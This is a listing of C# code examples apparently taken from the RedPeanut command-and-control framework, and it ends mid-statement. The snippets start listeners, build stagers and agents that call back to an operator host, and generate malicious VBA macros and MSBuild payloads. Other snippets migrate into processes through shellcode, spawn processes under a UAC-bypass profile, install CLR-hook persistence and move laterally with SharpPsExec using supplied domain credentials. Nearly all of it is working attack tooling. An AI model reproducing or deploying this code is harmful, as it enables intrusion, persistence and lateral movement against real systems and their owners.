예제 #1
0
        public void UpdateListenerConfig(string listenername, ListenerConfig listenerconfig)
        {
            try
            {
                listeners.Remove(listenerconfig.GetName());
                Listener res = dbcontext.Listeners.FirstOrDefault <Listener>(s => s.name == listenerconfig.GetName());
                res.name    = listenerconfig.GetName();
                res.lhost   = listenerconfig.GetHost();
                res.lport   = listenerconfig.GetPort();
                res.profile = listenerconfig.GetProfileid();
                if (listenerconfig.GetSsl())
                {
                    res.ListenerType = ListenerType.Https;
                }
                else
                {
                    res.ListenerType = ListenerType.Http;
                }

                dbcontext.Listeners.Update(res);
                dbcontext.SaveChanges();
            }
            catch (Exception)
            {
                Console.WriteLine("[x] Error removing listener");
            }
        }
예제 #2
0
 public void StartServerHttpServer(ListenerConfig lconfig)
 {
     httplistener = new RedPeanutC2(this, lconfig);
     servert      = new Thread(new ThreadStart(httplistener.Execute));
     servert.Start();
     lconfig.SetStarted(true);
 }
예제 #3
0
        //Send agentid
        //RC4 with serverkey
        private string CreateMsgAgentId(IAgentInstance agent, string serverkey, int profileid, int targetframework)
        {
            string mesg        = "";
            string folderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER);

            if (Program.GetC2Manager().GetC2Server().GetProfiles().ContainsKey(profileid))
            {
                AesManaged aes = agent.AesManager;
                AgentIdMsg msg = new AgentIdMsg
                {
                    agentid    = agent.AgentId,
                    sessionkey = aes.Key,
                    sessioniv  = aes.IV
                };

                HttpProfile profile = Program.GetC2Manager().GetC2Server().GetProfile(profileid);

                ListenerConfig conf   = new ListenerConfig("", ((AgentInstanceHttp)agent).GetAddress(), ((AgentInstanceHttp)agent).GetPort(), profile, profileid);
                string         source = System.IO.File.ReadAllText(Path.Combine(folderrpath, AGENT_TEMPLATE));
                source    = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), targetframework, conf);
                msg.stage = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, agent.AgentId + ".dll", targetframework, compprofile: CompilationProfile.Agent)));

                string agentidnmsg = JsonConvert.SerializeObject(msg, Formatting.Indented);
                mesg = EncryptMessage(serverkey, agentidnmsg);
            }
            return(mesg);
        }
예제 #4
0
        private void Run()
        {
            List <string> args = new List <string>();

            try
            {
                if (string.IsNullOrEmpty(filename) || string.IsNullOrEmpty(lhost) || lport < 1 || profile < 1)
                {
                    return;
                }
                else
                {
                    // Parse .cs sorce and repalce variable
                    string folderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER);
                    if (Program.GetC2Manager().GetC2Server().GetProfiles().ContainsKey(profile))
                    {
                        ListenerConfig conf   = new ListenerConfig("", lhost, lport, Program.GetC2Manager().GetC2Server().GetProfile(profile), profile);
                        string         source = File.ReadAllText(Path.Combine(folderrpath, STAGER_TEMPLATE));
                        source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), 40, conf);

                        Builder.GenerateExe(source, filename);
                    }
                }
            }
            catch (Exception e)
            {
                Console.WriteLine("[*] Error running task build {0}", e.Message);
                return;
            }
        }
예제 #5
0
        private void Run()
        {
            List <string> args = new List <string>();

            if (username == null || password == null || domain == null || targethost == null || lhost == null || profile == 0 || (lport == 0 && lpipename == null))
            {
                return;
            }
            else
            {
                //Create stager stream gzip
                string folderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER);
                if (Program.GetC2Manager().GetC2Server().GetProfiles().ContainsKey(profile))
                {
                    string source = File.ReadAllText(Path.Combine(folderrpath, STAGER_TEMPLATE));

                    if (lpipename == null)
                    {
                        //Http no pivot stager
                        ListenerConfig conf = new ListenerConfig("", lhost, lport, Program.GetC2Manager().GetC2Server().GetProfile(profile), profile);
                        source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), 40, conf);
                    }
                    else
                    {
                        //NamedPipe enable stager
                        ListenerPivotConfig conf = new ListenerPivotConfig("", lhost, lpipename, Program.GetC2Manager().GetC2Server().GetProfile(profile));
                        source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), 40, conf);
                    }

                    string stagerstr = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, RandomAString(10, new Random()) + ".dll", 40)));

                    //Create TaskMsg gzip
                    if (agent != null)
                    {
                        //Create Service stream gzip
                        source = File.ReadAllText(Path.Combine(folderrpath, SERVICE_TEMPLATE))
                                 .Replace("#NUTCLR#", Convert.ToBase64String(CompressGZipAssembly(Builder.GenerateShellcode(stagerstr, RandomString(10, new Random()) + ".exe", "RedPeanutRP", "Main", new string[] { "" }))))
                                 .Replace("#SPAWN#", Program.GetC2Manager().GetC2Server().GetProfile(profile).Spawn);

                        string servicestr = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, RandomAString(10, new Random()), 40, "exe")));

                        //Create SharpPsExec stream gzip
                        source = File.ReadAllText(Path.Combine(folderrpath, SHARPSEXEC_TEMPLATE))
                                 .Replace("#DOMAIN#", domain)
                                 .Replace("#USERNAME#", username)
                                 .Replace("#PASSWORD#", password)
                                 .Replace("#HOSTANME#", targethost)
                                 .Replace("#ASSEMBLY#", servicestr)
                                 .Replace("#EXENAME#", (!string.IsNullOrEmpty(exename)) ? exename : RandomAString(10, new Random()) + ".exe")
                                 .Replace("#SERVICEDISPLAYNAME#", (!string.IsNullOrEmpty(servdispname)) ? servdispname : RandomAString(10, new Random()))
                                 .Replace("#SERVICEDESCRIPTION#", (!string.IsNullOrEmpty(servdescr)) ? servdescr : RandomAString(10, new Random()))
                                 .Replace("#SERVICENAME#", (!string.IsNullOrEmpty(servname)) ? servname : RandomAString(10, new Random()));

                        string sharppsexecstr = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, RandomAString(10, new Random()) + ".dll", 40)));

                        RunAssemblyBase64(sharppsexecstr, "SharpPsExec.Program", new string[] { "pippo" }, agent);
                    }
                }
            }
        }
예제 #6
0
        static private void CheckConfiguredListeners(C2Server srv)
        {
            RedPeanutDBContext context = srv.GetDBContext();

            if (context.Listeners.Count() > 0)
            {
                Console.WriteLine("[*] Starting listeners");
                foreach (Listener l in context.Listeners)
                {
                    int    profileid = l.profile;
                    string name      = l.name;
                    string lhost     = l.lhost;
                    int    lport     = l.lport;

                    bool ssl = (l.ListenerType == ListenerType.Https) ? true : false;

                    if (profileid != 0 && srv.GetProfiles().ContainsKey(profileid))
                    {
                        HttpProfile    profile = srv.GetProfile(profileid);
                        ListenerConfig conf    = new ListenerConfig(name, lhost, lport, profile, profileid, ssl);
                        srv.ReloadListenerConfig(name, conf);
                        srv.StartServerHttpServer(conf);
                    }
                    else
                    {
                        HttpProfile    profile = srv.GetProfile(srv.GetDefaultProfile());
                        ListenerConfig conf    = new ListenerConfig(name, lhost, lport, profile, profileid, ssl);
                        srv.ReloadListenerConfig(name, conf);
                        srv.StartServerHttpServer(conf);
                    }
                }
            }
        }
예제 #7
0
        private void Run()
        {
            if (!srv.IsStarted(name))
            {
                if (!string.IsNullOrEmpty(lhost) && lport > 0 && !string.IsNullOrEmpty(name))
                {
                    HttpProfile profile;
                    if (profileid != 0 && srv.GetProfiles().ContainsKey(profileid))
                    {
                        profile = srv.GetProfile(profileid);
                    }
                    else
                    {
                        profile   = srv.GetProfile(srv.GetDefaultProfile());
                        profileid = srv.GetDefaultProfile();
                    }

                    ListenerConfig conf = new ListenerConfig(name, lhost, lport, profile, profileid, ssl);
                    srv.RegisterListenerConfig(name, conf);
                    srv.StartServerHttpServer(conf);
                }
                else
                {
                    Console.WriteLine("[-] pipename can't be null");
                }
            }
            else
            {
                Console.WriteLine("[-] Server running");
            }
        }
예제 #8
0
        public static string ReplaceAgentShooter(string src, string resourceurl, ListenerConfig config)
        {
            string source = src
                            .Replace("#HOST#", config.GetHost())
                            .Replace("#PORT#", config.GetPort().ToString())
                            .Replace("#RESURLCEURL#", resourceurl);

            return(source);
        }
예제 #9
0
        private void Run()
        {
            List <string> args = new List <string>();

            try
            {
                if (string.IsNullOrEmpty(filename) || string.IsNullOrEmpty(lhost) || lport < 1 || profile < 1)
                {
                    return;
                }
                else
                {
                    // Parse .cs sorce and repalce variable
                    string folderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER);
                    if (Program.GetC2Manager().GetC2Server().GetProfiles().ContainsKey(profile))
                    {
                        //Building agent
                        ListenerConfig conf   = new ListenerConfig("", lhost, lport, Program.GetC2Manager().GetC2Server().GetProfile(profile), profile);
                        string         source = File.ReadAllText(Path.Combine(folderrpath, STAGER_TEMPLATE));
                        source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), 35, conf);
                        string outfilename = RandomAString(10, new Random()) + ".dll";
                        Builder.GenerateDll(source, outfilename, 35);

                        //Add resource to webserver
                        C2Manager c2manager = Program.GetC2Manager();
                        c2manager.GetC2Server().RegisterWebResource(outfilename, new WebResourceInstance(null, outfilename));

                        string uricontent = Program.GetC2Manager().GetC2Server().GetProfile(profile).ContentUri.TrimStart('/');
                        if (!uricontent.EndsWith("/"))
                        {
                            uricontent += "/";
                        }

                        string resourcepath = uricontent + outfilename;

                        //Build shooter assembly
                        source = File.ReadAllText(Path.Combine(folderrpath, SHOOTER_TEMPLATE));
                        source = Replacer.ReplaceAgentShooter(source, resourcepath, conf);

                        string assemblyBase64 = Builder.GenerateDllBase64(source, RandomAString(10, new Random()) + ".dll", 35);

                        VBAGenerator gen = new VBAGenerator(assemblyBase64, null);

                        //Write file to dest dir
                        string destdir = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, EVILCLIPPY_FOLDER);
                        File.WriteAllText(Path.Combine(destdir, filename), gen.GetScriptText());
                        Console.WriteLine("[*] {0} Created", Path.Combine(destdir, filename));
                    }
                }
            }
            catch (Exception e)
            {
                Console.WriteLine("[*] Error running task build {0}", e.Message);
                return;
            }
        }
예제 #10
0
        private void Run()
        {
            List <string> args = new List <string>();

            try
            {
                if (string.IsNullOrEmpty(filename) || string.IsNullOrEmpty(lhost) || lport < 1 || profile < 1)
                {
                    return;
                }
                else
                {
                    // Parse .cs sorce and repalce variable
                    string folderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER);
                    if (Program.GetC2Manager().GetC2Server().GetProfiles().ContainsKey(profile))
                    {
                        ListenerConfig conf   = new ListenerConfig("", lhost, lport, Program.GetC2Manager().GetC2Server().GetProfile(profile), profile);
                        string         source = File.ReadAllText(Path.Combine(folderrpath, STAGER_TEMPLATE));
                        source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), 40, conf);

                        string assemblyBase64 = Builder.GenerateDllBase64(source, filename);

                        byte[] assemblybytte   = Convert.FromBase64String(assemblyBase64);
                        string agentCompBase64 = Convert.ToBase64String(CompressGZipAssembly(assemblybytte));

                        Dictionary <string, string> msbuildargs = new Dictionary <string, string>();
                        msbuildargs.Add("#{taskname}", taskname);

                        MSBuildGenerator gen = new MSBuildGenerator(agentCompBase64, msbuildargs);

                        if (hosted)
                        {
                            //Add resource to webserver storage
                            C2Manager c2manager = Program.GetC2Manager();
                            c2manager.GetC2Server().RegisterWebResource(filename, new WebResourceInstance(gen, filename));
                            Console.WriteLine("[*] Resource added to webserver resources");
                            return;
                        }
                        else
                        {
                            //Write file to tmp env dir
                            File.WriteAllText(Path.Combine(Path.GetTempPath(), filename), gen.GetScriptText());
                            Console.WriteLine("[*] {0} Created", Path.Combine(Path.GetTempPath(), filename));
                        }
                    }
                }
            }
            catch (Exception e)
            {
                Console.WriteLine("[*] Error running task build {0}", e.Message);
                return;
            }
        }
예제 #11
0
 public void RemoveListenerConfig(ListenerConfig listenerconfig)
 {
     try
     {
         listeners.Remove(listenerconfig.GetName());
         Listener res = dbcontext.Listeners.FirstOrDefault <Listener>(s => s.name == listenerconfig.GetName());
         dbcontext.Listeners.Remove(res);
         dbcontext.SaveChanges();
     }
     catch (Exception)
     {
         Console.WriteLine("[x] Error removing listener");
     }
 }
예제 #12
0
        private void ListenerMenu(string input)
        {
            string f_input = ParseSelection(input);

            if (!string.IsNullOrEmpty(input))
            {
                if (mainmenu.ContainsKey(f_input.TrimEnd()))
                {
                    switch (f_input.TrimEnd())
                    {
                    case "remove":
                        if (Program.GetC2Manager().GetC2Server().GetListenersConfig().ContainsKey(listenername))
                        {
                            try
                            {
                                ListenerConfig lc = Program.GetC2Manager().GetC2Server().GetListenersConfig()[listenername];
                                lc.CancellationTokenSource.Cancel();
                                Program.GetC2Manager().GetC2Server().RemoveListenerConfig(lc);
                            }catch (Exception)
                            {}
                            exit = true;
                        }
                        break;

                    case "set listenername":
                        listenername = GetParsedSetString(input);
                        break;

                    case "options":
                        PrintOptionsNoStd("options", mainmenu);
                        break;

                    case "back":
                        Program.GetMenuStack().Pop();
                        exit = true;
                        return;

                    default:
                        Console.WriteLine("We had a woodoo");
                        break;
                    }
                }
                else
                {
                    PrintOptionsNoStd("Command not found", mainmenu);
                }
            }
        }
예제 #13
0
        private void RunMigrate(int pid)
        {
            string folderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER);
            //Create RedPeanutAgent assembly
            string source = File.ReadAllText(Path.Combine(folderrpath, AGENT_TEMPLATE));

            ListenerConfig conf = new ListenerConfig("", ((AgentInstanceHttp)agent).GetAddress(), ((AgentInstanceHttp)agent).GetPort(), RedPeanutC2.server.GetProfile(((AgentInstanceHttp)agent).GetProfileid()), ((AgentInstanceHttp)agent).GetProfileid());

            source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), ((AgentInstanceHttp)agent).TargetFramework, conf);
            string b64CompressedAgent = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, agent.AgentId + ".dll", ((AgentInstanceHttp)agent).TargetFramework, compprofile: CompilationProfile.Agent)));
            string instanceid         = RandomAString(10, new Random());

            //Create AgentState
            AgentState astate = new AgentState
            {
                Agentid           = agent.AgentId,
                sessionkey        = agent.AesManager.Key,
                sessioniv         = agent.AesManager.IV,
                cookie            = ((AgentInstanceHttp)agent).Cookie,
                RequestInstanceid = instanceid
            };

            if (agent.Pivoter != null)
            {
                astate.pipename = agent.Pivoter.AgentId;
            }

            string b64State = Convert.ToBase64String(Utility.CompressGZipAssembly(Encoding.Default.GetBytes(JsonConvert.SerializeObject(astate, Formatting.Indented))));

            string[] argsm = Utility.Split(b64State, 100).ToArray();

            //Read template
            source = File.ReadAllText(Path.Combine(folderrpath, MIGRATE_TEMPLATE));
            //Replace
            source = Replacer.ReplaceMigrate(source, Convert.ToBase64String(CompressGZipAssembly(
                                                                                Builder.GenerateShellcode(b64CompressedAgent, RandomAString(10, new Random()) + ".exe", "RedPeanutAgent.Worker", "LoadAndRun", argsm)
                                                                                )), pid);
            //Run
            string migrate = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, RandomAString(10, new Random()) + ".dll", ((AgentInstanceHttp)agent).TargetFramework, compprofile: CompilationProfile.Migrate)));

            RunAssemblyBase64(
                migrate,
                "RedPeanutMigrate",
                new string[] { " " },
                agent, tasktype: "migrate", instanceid: instanceid);
        }
예제 #14
0
 public void ListListeners()
 {
     if (GetListenersConfig() != null)
     {
         foreach (KeyValuePair <string, ListenerConfig> item in GetListenersConfig())
         {
             try
             {
                 ListenerConfig listenerConfig = item.Value;
                 Console.WriteLine("[*] {0} | Host: {1} | port: {2} | profile: {3}", listenerConfig.GetName(), listenerConfig.GetHost(), listenerConfig.GetPort(), listenerConfig.GetProfileid());
             }
             catch (Exception e)
             {
                 Console.WriteLine("[x] Listener need to be removed {0}", e.Message);
             }
         }
     }
 }
예제 #15
0
 public void ReloadListenerConfig(string listenername, ListenerConfig listenerconfig)
 {
     try
     {
         if (!listeners.ContainsKey(listenername))
         {
             listeners.Add(listenername, listenerconfig);
         }
         else
         {
             Console.WriteLine("[x] Listener already exist");
         }
     }
     catch (Exception e)
     {
         Console.WriteLine("[x] Error adding listener {0}", e.Message);
     }
 }
예제 #16
0
        public void RegisterListenerConfig(string listenername, ListenerConfig listenerconfig)
        {
            try
            {
                if (!listeners.ContainsKey(listenername))
                {
                    listeners.Add(listenername, listenerconfig);
                    Listener listener = dbcontext.Listeners.FirstOrDefault <Listener>(s => s.name == listenername);
                    if (listener == null)
                    {
                        listener = new Listener
                        {
                            name    = listenerconfig.GetName(),
                            lhost   = listenerconfig.GetHost(),
                            lport   = listenerconfig.GetPort(),
                            profile = listenerconfig.GetProfileid(),
                        };

                        if (listenerconfig.GetSsl())
                        {
                            listener.ListenerType = ListenerType.Https;
                        }
                        else
                        {
                            listener.ListenerType = ListenerType.Http;
                        }
                        dbcontext.Listeners.Add(listener);
                        dbcontext.SaveChanges();
                    }
                }
                else
                {
                    Console.WriteLine("[x] Listener already exist");
                }
            }
            catch (Exception e)
            {
                Console.WriteLine("[x] Error adding listener {0}", e.Message);
            }
        }
예제 #17
0
        public void ListListeners()
        {
            if (GetListenersConfig() != null)
            {
                Console.WriteLine("[*]  {0}", new string('-', 66));
                Console.WriteLine("[*] | {0,-20} | {1,-15} | {2,-5} | {3,-7} | {4,-5} |", "Name", "IP", "Port", "Profile", "SSL");
                Console.WriteLine("[*]  {0}", new string('-', 66));

                foreach (KeyValuePair <string, ListenerConfig> item in GetListenersConfig())
                {
                    try
                    {
                        ListenerConfig listenerConfig = item.Value;
                        Console.WriteLine("[*] | {0,-20} | {1,-15} | {2,-5} | {3,-7} | {4,-5} |", listenerConfig.GetName(), listenerConfig.GetHost(), listenerConfig.GetPort(), listenerConfig.GetProfileid(), listenerConfig.GetSsl());
                    }
                    catch (Exception e)
                    {
                        Console.WriteLine("[x] Listener need to be removed {0}", e.Message);
                    }
                }
                Console.WriteLine("[*]  {0}", new string('-', 66));
            }
        }
예제 #18
0
        private void Run()
        {
            try
            {
                string host            = ((AgentInstanceHttp)agent).GetAddress();
                int    port            = ((AgentInstanceHttp)agent).GetPort();
                int    profileid       = ((AgentInstanceHttp)agent).GetProfileid();
                int    targetframework = ((AgentInstanceHttp)agent).TargetFramework;
                string pipename        = "";

                if (agent.Pivoter != null)
                {
                    host            = agent.Pivoter.SysInfo.Ip;
                    port            = 0;
                    profileid       = RedPeanutC2.server.GetDefaultProfile();
                    targetframework = agent.TargetFramework;
                    pipename        = agent.AgentId;
                }
                else
                {
                    host            = ((AgentInstanceHttp)agent).GetAddress();
                    port            = ((AgentInstanceHttp)agent).GetPort();
                    profileid       = ((AgentInstanceHttp)agent).GetProfileid();
                    targetframework = agent.TargetFramework;
                }

                string folderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER);
                if (Program.GetC2Manager().GetC2Server().GetProfiles().ContainsKey(profileid))
                {
                    string source;

                    if (string.IsNullOrEmpty(pipename))
                    {
                        //Http no pivot stager
                        ListenerConfig conf = new ListenerConfig("", host, port, Program.GetC2Manager().GetC2Server().GetProfile(profileid), profileid);
                        source = File.ReadAllText(Path.Combine(folderrpath, STAGER_TEMPLATE));
                        source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), targetframework, conf);
                    }
                    else
                    {
                        //NamedPipe enable stager
                        ListenerPivotConfig conf = new ListenerPivotConfig("", host, pipename, Program.GetC2Manager().GetC2Server().GetProfile(profileid));
                        source = File.ReadAllText(Path.Combine(folderrpath, STAGER_TEMPLATE));
                        source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), targetframework, conf);
                    }

                    string stagerstr = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, RandomAString(10, new Random()) + ".dll", targetframework)));

                    ModuleConfig modconfig = new ModuleConfig
                    {
                        Assembly    = stagerstr,
                        Method      = "Execute",
                        Moduleclass = "RedPeanutRP",
                        Parameters  = new string[] { "pippo" }
                    };

                    TaskMsg task = new TaskMsg
                    {
                        TaskType   = "module",
                        ModuleTask = modconfig,
                        Agentid    = agent.AgentId
                    };

                    if (agent.Pivoter != null)
                    {
                        task.AgentPivot = agent.Pivoter.AgentId;
                    }

                    source = File.ReadAllText(Path.Combine(folderrpath, SPAWN_TEMPLATE))
                             .Replace("#NUTCLR#", ReadResourceFile(PL_COMMAND_NUTCLRWNF))
                             .Replace("#TASK#", Convert.ToBase64String(CompressGZipAssembly(Encoding.Default.GetBytes(JsonConvert.SerializeObject(task)))))
                             .Replace("#SPAWN#", Program.GetC2Manager().GetC2Server().GetProfile(profileid).Spawn)
                             .Replace("#SHELLCODE#", null)
                             .Replace("#USERNAME#", username)
                             .Replace("#PASSWORD#", password)
                             .Replace("#DOMAIN#", domain)
                             .Replace("#PROCESS#", null);

                    string spawnprocess = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, RandomAString(10, new Random()) + ".dll", targetframework, compprofile: CompilationProfile.UACBypass)));
                    RunAssemblyBase64(
                        spawnprocess,
                        "RedPeanutSpawn",
                        new string[] { " " },
                        agent);
                }
            }
            catch (Exception)
            {
                Console.WriteLine("[*] Errore generating task");
            }
        }
예제 #19
0
        private void Run()
        {
            List <string> args = new List <string>();

            if (username == null || password == null || domain == null || targethost == null || lhost == null || profile == 0 || (lport == 0 && lpipename == null))
            {
                return;
            }
            else
            {
                //Create stager stream gzip
                string folderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER);
                if (Program.GetC2Manager().GetC2Server().GetProfiles().ContainsKey(profile))
                {
                    string source = File.ReadAllText(Path.Combine(folderrpath, STAGER_TEMPLATE));

                    if (lpipename == null)
                    {
                        //Http no pivot stager
                        ListenerConfig conf = new ListenerConfig("", lhost, lport, Program.GetC2Manager().GetC2Server().GetProfile(profile), profile);
                        source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), 40, conf);
                    }
                    else
                    {
                        //NamedPipe enable stager
                        ListenerPivotConfig conf = new ListenerPivotConfig("", lhost, lpipename, Program.GetC2Manager().GetC2Server().GetProfile(profile));
                        source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), 40, conf);
                    }

                    string stagerstr = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, RandomAString(10, new Random()), 40)));

                    //Create TaskMsg gzip
                    if (agent != null)
                    {
                        ModuleConfig modconfig = new ModuleConfig
                        {
                            Assembly    = stagerstr,
                            Method      = "Execute",
                            Moduleclass = "RedPeanutRP",
                            Parameters  = new string[] { "pippo" }
                        };

                        TaskMsg task = new TaskMsg
                        {
                            TaskType   = "module",
                            ModuleTask = modconfig,
                            Agentid    = agent.AgentId
                        };

                        if (agent.Pivoter != null)
                        {
                            task.AgentPivot = agent.Pivoter.AgentId;
                        }

                        //Create Service stream gzip
                        source = File.ReadAllText(Path.Combine(folderrpath, SERVICE_TEMPLATE))
                                 .Replace("#NUTCLR#", ReadResourceFile(PL_COMMAND_NUTCLR))
                                 .Replace("#TASK#", Convert.ToBase64String(CompressGZipAssembly(Encoding.Default.GetBytes(JsonConvert.SerializeObject(task)))))
                                 .Replace("#SPAWN#", Program.GetC2Manager().GetC2Server().GetProfile(profile).Spawn);

                        string servicestr = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, RandomAString(10, new Random()), 40, "exe")));

                        //Create SharpPsExec stream gzip
                        source = File.ReadAllText(Path.Combine(folderrpath, SHARPSEXEC_TEMPLATE))
                                 .Replace("#DOMAIN#", domain)
                                 .Replace("#USERNAME#", username)
                                 .Replace("#PASSWORD#", password)
                                 .Replace("#HOSTANME#", targethost)
                                 .Replace("#ASSEMBLY#", servicestr)
                                 .Replace("#EXENAME#", (!string.IsNullOrEmpty(exename)) ? exename : RandomAString(10, new Random()) + ".exe")
                                 .Replace("#SERVICEDISPLAYNAME#", (!string.IsNullOrEmpty(servdispname)) ? servdispname : RandomAString(10, new Random()))
                                 .Replace("#SERVICEDESCRIPTION#", (!string.IsNullOrEmpty(servdescr)) ? servdescr : RandomAString(10, new Random()))
                                 .Replace("#SERVICENAME#", (!string.IsNullOrEmpty(servname)) ? servname : RandomAString(10, new Random()));

                        string sharppsexecstr = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, RandomAString(10, new Random()) + ".dll", 40)));

                        RunAssemblyBase64(sharppsexecstr, "SharpPsExec.Program", new string[] { "pippo" }, agent);
                    }
                }
            }
        }
예제 #20
0
        private void Run()
        {
            try
            {
                string host            = ((AgentInstanceHttp)agent).GetAddress();
                int    port            = ((AgentInstanceHttp)agent).GetPort();
                int    profileid       = ((AgentInstanceHttp)agent).GetProfileid();
                int    targetframework = ((AgentInstanceHttp)agent).TargetFramework;
                string pipename        = "";

                if (!string.IsNullOrEmpty(process))
                {
                    if (agent.Pivoter != null)
                    {
                        host            = agent.Pivoter.SysInfo.Ip;
                        port            = 0;
                        profileid       = RedPeanutC2.server.GetDefaultProfile();
                        targetframework = agent.TargetFramework;
                        pipename        = agent.AgentId;
                    }
                    else
                    {
                        host            = ((AgentInstanceHttp)agent).GetAddress();
                        port            = ((AgentInstanceHttp)agent).GetPort();
                        profileid       = ((AgentInstanceHttp)agent).GetProfileid();
                        targetframework = agent.TargetFramework;
                    }

                    string folderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER);
                    if (Program.GetC2Manager().GetC2Server().GetProfiles().ContainsKey(profileid))
                    {
                        string source;

                        if (string.IsNullOrEmpty(pipename))
                        {
                            //Http no pivot stager
                            ListenerConfig conf = new ListenerConfig("", host, port, Program.GetC2Manager().GetC2Server().GetProfile(profileid), profileid);
                            source = File.ReadAllText(Path.Combine(folderrpath, STAGER_TEMPLATE));
                            source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), targetframework, conf);
                        }
                        else
                        {
                            //NamedPipe enable stager
                            ListenerPivotConfig conf = new ListenerPivotConfig("", host, pipename, Program.GetC2Manager().GetC2Server().GetProfile(profileid));
                            source = File.ReadAllText(Path.Combine(folderrpath, STAGER_TEMPLATE));
                            source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), targetframework, conf);
                        }

                        string stagerstr = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, RandomAString(10, new Random()) + ".dll", targetframework)));

                        string hookfilename = RandomAString(10, new Random()) + ".dll";
                        //string clrhook = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, hookfilename, targetframework, compprofile: CompilationProfile.PersistenceCLR)));

                        string keyfilename = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, KEYFILE_FOLDER, "key.snk");

                        if (clrversion != 35 && clrversion != 40)
                        {
                            clrversion = 40;
                        }

                        source = File.ReadAllText(Path.Combine(folderrpath, CLRHOOKINSTALL_TEMPLATE))
                                 .Replace("#KEYFILE#", Convert.ToBase64String(CompressGZipAssembly(File.ReadAllBytes(keyfilename))))
                                 .Replace("#STAGER#", stagerstr)
                                 .Replace("#FILENAME#", hookfilename)
                                 .Replace("#PROCESS#", process)
                                 .Replace("#CLRVERSION#", clrversion.ToString());

                        string clrhookinstaller = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, RandomAString(10, new Random()) + ".dll", targetframework, compprofile: CompilationProfile.UACBypass)));

                        if (uninstall)
                        {
                            RunAssemblyBase64(clrhookinstaller, "PersCLRInstall", new string[] { "cleanenv" }, agent);
                        }
                        else
                        {
                            RunAssemblyBase64(clrhookinstaller, "PersCLRInstall", new string[] { "install" }, agent);
                        }
                    }
                }
            }
            catch (Exception)
            {
                Console.WriteLine("[*] Errore generating task");
            }
        }
예제 #21
0
        private void Run()
        {
            try
            {
                if (string.IsNullOrEmpty(username) || string.IsNullOrEmpty(password) || string.IsNullOrEmpty(lhost) || (string.IsNullOrEmpty(lpipename) && lport < 1) || profile < 1)
                {
                    return;
                }
                else
                {
                    // Parse .cs sorce and repalce variable
                    string folderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER);
                    if (Program.GetC2Manager().GetC2Server().GetProfiles().ContainsKey(profile))
                    {
                        string domainname = ".";
                        if (!string.IsNullOrEmpty(domain))
                        {
                            domainname = domain;
                        }

                        string source = File.ReadAllText(Path.Combine(folderrpath, STAGER_TEMPLATE));

                        if (lpipename == null)
                        {
                            //Http no pivot stager
                            ListenerConfig conf = new ListenerConfig("", lhost, lport, Program.GetC2Manager().GetC2Server().GetProfile(profile), profile);
                            source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), 40, conf);
                        }
                        else
                        {
                            //NamedPipe enable stager
                            ListenerPivotConfig conf = new ListenerPivotConfig("", lhost, lpipename, Program.GetC2Manager().GetC2Server().GetProfile(profile));
                            source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), 40, conf);
                        }

                        string stagerstr = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, RandomAString(10, new Random()) + ".dll", 40)));

                        //Create TaskMsg gzip
                        if (agent != null)
                        {
                            source = File.ReadAllText(Path.Combine(folderrpath, SPAWNER_TEMPLATE))
                                     .Replace("#NUTCLR#", Convert.ToBase64String(CompressGZipAssembly(Builder.GenerateShellcode(stagerstr, RandomString(10, new Random()) + ".exe", "RedPeanutRP", "Main", new string[] { "" }))))
                                     .Replace("#SPAWN#", Program.GetC2Manager().GetC2Server().GetProfile(profile).Spawn)
                                     .Replace("#USERNAME#", username)
